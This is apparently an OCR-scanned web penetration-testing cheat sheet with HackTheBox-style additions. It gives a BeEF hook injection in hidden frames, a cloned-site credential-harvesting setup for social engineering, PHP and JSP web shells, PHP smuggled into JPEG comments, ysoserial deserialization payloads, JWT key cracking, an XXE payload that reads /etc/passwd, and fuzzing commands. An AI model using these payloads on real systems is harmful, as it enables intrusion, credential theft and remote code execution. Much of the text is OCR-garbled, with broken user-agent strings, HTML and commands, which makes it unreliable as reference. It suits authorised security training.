Comment on page


the Web

Common user-agents

Internet Explorer (6.0, 7.0, 8.0, 9.0)

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
IE 6.0/WinXP 32-bit
Mozilla/ 4. 0 (compatible; MSIE 7. 0; Windows NT 5.1; SV1; .NET CLR 2.0.50-2 7 )
IE 7.0/WinXP 32-bit
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 3.5.30 7 29)
IE 8.0/WinVista 32-bit
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
IE 9.0/Win7 32-bit
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
IE 9.0/Win7 64-bit

Firefox (5.0, 13.0, 17.0)

Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0
Firefox 5.0/Win7 64-bit
Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1
Firefox 13.0/WinXP 32-bit
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.01 Gecko/20100101 Firefox/17.0
Firefox 17/Win7 64-bit
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:17.0) Gecko/20100101 Firefox/17.0
Firefox 17.0/Linux
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:17. 0) Gecko/20100101 Firefox/1 7 .0
Firefox 17.0/MacOSX 10.7
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:17.0) Gecko/20100101 Firefox/17.0
Firefox 17.0/MacOSX 10.8

Chrome (Generic 13.0)

Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/53-.11
Chrome Generic/WinXP
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537 .11 (KHTl~L, like Gecko) Chrome/23.0.1271.97 Safari/53-.11
Chrome Generic/Win7
Mozilla/5.0 (X11; Linux x86 64) AppleWebKit/537 .11 (KHTl~L, like Gecko) Chrome/23.0.1271.97 Safari/53 7 .11
Chrome Generic/Linux
Mozilla/5.0 (Macintosh; Intel Mac OS X 10 8 2) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.12-1.101 Safari/537.11
Chrome Generic/MacOSX
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Chrome 13.0/Win7 64-bit

Safari (6.0)

Mozilla/5.0 (Macintosh; Intel Mac OS X 10 ~ 5) AppleWebKit/536.26.17 (KHTML, like Ge~ko) Version/6.0.2 Safari/536.26.17
Safari 6.0/MacOSX

Mobile safari (4.0 & 6.0)

Mozilla/5.0 (iPad; CPU OS 6 0 1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A523 Safari/8536.25
Mobile Safari 6.0/iOS (iPad)
Mozilla/5.0 (iPhone; CPU iPhone OS 6 0 1 like l~ac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A523 Safari/8536.25
Mobile Safari 6.0/iOS (iPhone)
Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4. 0 Mobile Safari/533.1
Mobile Safari 4.0/Android

HTML language

beef code embedded in iframe

!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
title Campaign Title· /title
var commandModuleStr = ' script src= "' + window.location.protocol +
'//' + window. location. host + ':8080/hook.js"
type="text/javascript" \/script.';
//Site refresh=window.setTimeout(function() {window.location.href='http://ww'},20000);
frameset rows="*,1px"
frame src="" frameborder=O
noresize="noresize" /
frame src="/e" frarneborder=O scrolling=no noresize=noresize /

Embedded java applet code (* must be placed in <body>)

applet archive="legit.jar" code="This is a legit applet" width="1"

Embedded iframe

iframe src="" width="0" height="0" frameborder="0"
tabindex="-1" title="empty" style="visibility:hidden;display:none"

Firefox connection methods

ASCII - Base64 javascript:btoa("ascii str")
Base64 - ASCII javascript:atob("base64==")
ASCII - URI javascript:encodeURI(" script "}
URI - ASCII javascript:decodeURI("%3cscript%3E")

Wget command

Token session recording

wget -q --save-cookies=cookie.txt --keep-session-cookies --post-
data="username: admin&password=pass&Login=Login" http://url/login. php

Curl command

Get web page headers by changing user agent

curl -I -X HEAD -A "Mozilla/5.0 (compatible; MSIE 7.01; Windows NT 5.0)"
http:// ip

Get the page after authentication

curl -u user:pass -o outfile

Ftp command

curl ftp://user:[email protected]/directory/

Check different files


Creating Basic authentication in apache2

The steps below will clone a website and redirect after 3 seconds to
another page requiring basic authentication. It has proven very useful for
Collecting credentials during social engineering engagements.
1. Start Social Engineering Toolkit (SET)
2. Through SET, use the 'Website Attack Vector' menu to clone yours
preferred website. 'Do not close SET'
3. In a new terminal create a new directory (lowercase L)
mkdir /var/www/1
4. Browse to SET directory and copy the cloned site
cd /pentest/exploits/set/src/web clone/site/template/
cp index.html /var/www/index.html
cp index.html /var/www/1/index.html
5. Open /var/www/index.html and add tag between head tags
meta http-equiv="refresh"
content="3;url=http:// domainlip /1/index.html"/
6. Create blank password file to be used for basic auth
touch /etc/apache2/.htpasswd
7. Open /etc/apache2/sites-available/default and add:
Directory /var/www/1
AuthType Basic
AuthUserFile /etc/apache2/.htpasswd
Require user test
8. Start Apache2
/etc/init.d/apache2 start
9. Start Wireshark and add the filter:
10. Send the following link to your target users

Automate the photo process from the web page

Using nmap

Install dependencies:
wget rc1-
tar -jxvf wkhtmltoimage-0.11.0 rc1-statlc-i386.tar.bz2
cp wkhtmltoimage-i386 /usr/local/bin/
Install Nmap module:
git clone git://
cd Nmap-Tools/NSE/
cp http-screenshot.nse /usr/local/share/nmap/scripts/
nmap --script-updatedb
OS/version detection using screenshot script (screenshots saved as .png):
nmap -A -script=http-screenshot -p80,443 -oA nmap-
Script will generate HTML preview page with all screenshots:
printf "HTHL.- BODY BR"
ls -1 '.png I awk -F : ' {print $1":"$2"\n BR- IMG SRC=\""$1"%3A"$2"\"
width=400 BR BR ")' preview. html
printf " /BODY /HTML. " preview. html

Peepingtom command

Installation Dependencies:
Download Phantomjs
Download PeepingTom
git clone
Extract and copy phantomjs from phantomjs-1.9.2-linux-x86 64.tar.bz2 and
copy to peepingtom directory
Run PeepingTom
python http://

Injection of different payloads with wfuzz

wfuzz -c -z file,/usr/share/wfuzz/wordlist/Injections/XSS.txt -hc 404

Guess different files with specific extensions with wfuzz

wfuzz -w /usr/share/wordlists/big.txt -u http://admirer.htb/admin/FUZZ.FUZ2Z -z list,txt-php --hc 403,404 -c

guess at POST requests

wfuzz -X POST -u ''http://quick.htb/login.php' -w elist.txt -d 'email=FUZZ&password=123456' -hc 200 -c

Guess web paths with ffuf

ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -u

Guess subdomain with gobuster

gobuster dns -t 50 -d -w ~/seclists/Dir/subdomains.dat
Subdomain guess with ffuf
ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http:// -H "Host:"

Find subdomain based on certificates
assetfinder --subs-only <domain> | httprobe

Injection of php inside jpeg

giftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' me.jpg

Exploit deserialization of Java programs

java -jar ysoserial.jar CommonsBeanutils1 'COMMAND' | base64 -w0

Famous web shells

Extracting the structure of folders and files from .git

Extract information from .git
./ /tmp/mygitrepo /tmp/mygitrepodump

Extract information from .DS_Store

1- find structure
python2.7 http://poo.htb/.DS_Store
2-enum in found path
java -jar iis_shortname_scanner.jar 2 20 http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/

Extracting page parameters

python3 --domain --exclude woff,css,js,png,svg,php,jpg --output bugcrowd.txt

Examining the structure of parameters based on patterns of vulnerabilities

gf xss domain.txt
gf potential domain.txt

Guess the jwt symmetric encryption key

jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuwxyz" 6

public key guess jwt asymmetric encryption

docker run --rm -it portswigger/sig2n <token1> <token2>

Create web shell jpg

giftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' meme.jpg

Create web shell jsp

<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>

Read file with xxe

<? xml\ version = "1.0"\ encoding = "UTF − 8"? >
< ! DOCTYPE\ abc\ [
< ! ENTITY\ ab\ SYSTEM\ "file:///etc/passwd" >
] >
< root >< name > &ab; </name >< tel > demo </tel >< email > demo@demo. com </email >< password > demo <
/password ></root >